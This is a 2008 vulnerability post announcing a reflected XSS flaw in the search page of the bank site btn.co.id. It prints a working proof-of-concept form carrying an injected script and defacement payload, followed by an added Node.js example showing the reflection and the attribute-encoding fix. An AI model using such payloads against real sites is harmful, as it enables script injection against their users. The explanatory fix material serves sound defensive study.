Bank BTN Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Monday, July 21st, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved



{image: btn.co.id XSSED by SPYRO KiD}

btn.co.id XSSED by SPYRO KiD

{image: btn.co.id accepts every HTML tag}

btn.co.id accepts every HTML tag

POC (an attacker-hosted page that POSTs a crafted srchField to the search handler; the server reflects the term into the results page without encoding it, so the payload closes the value="..." attribute it lands in and the markup that follows is rendered as part of the page):

<!-- Submits the btn.co.id search form with a crafted srchField when the image is clicked.
     The payload is HTML-entity encoded so it survives inside this value="..." attribute;
     the browser decodes it before POSTing, so the server receives the raw markup. -->
<form name="srchBTNCare" method="post" action="http://www.btn.co.id/btn_care_cat.asp">
<!-- Decoded, the value begins with "> to close the reflected attribute and its <input>, then closes
     the enclosing form/td/tr/table, injects a heading and a <script> that calls alert(), and ends
     with an unclosed <noscript> so script-enabled browsers hide the remainder of the original page. -->
<input type="hidden" name="srchField" size="20" value="&quot;&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;center&gt;&lt;br&gt;&lt;h1&gt;XSSED&lt;br&gt;&lt;br&gt;by&lt;br&gt;&lt;br&gt;SPYRO KiD&lt;br&gt;http://spyrozone.net&lt;/h1&gt;&lt;br&gt;&lt;br&gt;&lt;script&gt;alert(&quot;XSSED by SPYRO KiD\nhttp://spyrozone.net || admin@spyrozone.net&quot;);&lt;/script&gt;&lt;noscript&gt;">
<!-- An image input submits the form on its own; the onClick is redundant but harmless. -->
<input name="submit" type="image" border="0" src="clickhere.gif" alt="Click Here" onClick="srchBTNCare.submit();">
<!-- The remaining parameters the real search form sends, so the handler takes the normal search path. -->
<input type="hidden" name="srchParam" value="question">
<input type="hidden" name="srchDo" value="1">
</form>
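The reflection the POC depends on, modelled in Node.js as an added example (this is not code from the original post or from btn.co.id). The payload string is the POC's own; the form markup around the input, the handler name and the hardened version are assumptions about what btn_care_cat.asp did and should have done. The block decodes the entity-encoded value to show exactly what is POSTed, renders it through a raw-concatenation template and through one that encodes for the attribute context, and runs a toy check for a `<script>` that landed outside any attribute.

```javascript
// Added example, not from the original post: models the reflection the POC
// above depends on and the attribute encoding that neutralises it.
// The surrounding markup and handler name are assumptions about
// btn_care_cat.asp; only the payload string is taken from the POC.

// The POC's value="..." attribute, verbatim. Its \n is a literal backslash-n
// in the HTML, so it is written as \\n inside this JS string literal.
const POC_VALUE_ATTR =
  '&quot;&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;center&gt;' +
  '&lt;br&gt;&lt;h1&gt;XSSED&lt;br&gt;&lt;br&gt;by&lt;br&gt;&lt;br&gt;SPYRO KiD' +
  '&lt;br&gt;http://spyrozone.net&lt;/h1&gt;&lt;br&gt;&lt;br&gt;&lt;script&gt;' +
  'alert(&quot;XSSED by SPYRO KiD\\nhttp://spyrozone.net || admin@spyrozone.net' +
  '&quot;);&lt;/script&gt;&lt;noscript&gt;';

// Decode the entities the POC uses (plus &amp;): this is the string the
// browser actually places in the srchField POST parameter.
function decodeEntities(s) {
  const map = { quot: '"', gt: '>', lt: '<', amp: '&' };
  return s.replace(/&(quot|gt|lt|amp);/g, (_, name) => map[name]);
}
const POC_PAYLOAD = decodeEntities(POC_VALUE_ATTR);

// Hypothetical server-side template: the search term is echoed back into the
// form so the search box keeps the user's query (assumed structure).
function renderForm(valueAttr) {
  return '<table><tr><td><form method="post" action="btn_care_cat.asp">' +
    '<input type="text" name="srchField" value="' + valueAttr + '">' +
    '</form></td></tr></table>';
}

// Vulnerable: raw concatenation. The payload's leading "> closes the
// attribute and the <input>, its closing tags pop out of the table, and the
// <script> it carries is parsed as markup and executed.
function renderVulnerable(term) {
  return renderForm(term);
}

// Hardened: encode for the double-quoted HTML attribute context first.
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderSafe(term) {
  return renderForm(escapeHtmlAttr(term));
}

// Toy check, not an HTML parser: blank out every double-quoted attribute
// value, then look for an opening <tag> left over in markup position.
function hasInjectedTag(html, tag) {
  const stripped = html.replace(/"[^"]*"/g, '""');
  return new RegExp('<' + tag + '[\\s>]', 'i').test(stripped);
}
```

`hasInjectedTag(renderVulnerable(POC_PAYLOAD), 'script')` is true and the same call on `renderSafe` is false: the encoded term sits entirely inside `value="…"`, and the browser shows the user the literal payload text in the search box instead of parsing it. Note that the fix is context-specific: attribute encoding is the right choice here because the reflection point is a quoted attribute; a term reflected into a `<script>` block or an unquoted attribute would need different encoding.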


//E.O.F